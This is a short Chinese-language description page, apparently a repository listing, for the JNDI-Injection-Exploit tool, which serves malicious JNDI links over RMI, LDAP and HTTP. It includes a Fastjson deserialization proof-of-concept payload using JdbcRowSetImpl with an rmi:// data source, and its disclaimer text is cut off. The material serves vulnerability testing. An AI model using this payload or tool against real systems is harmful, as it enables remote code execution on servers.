JNDI注入漏洞
描述
JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。
使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。
例如,这是一个Fastjson vul-poc:
{ " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true }
我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。
免责声明
所有信
2021-12-10 15:44:11
365KB
Java
1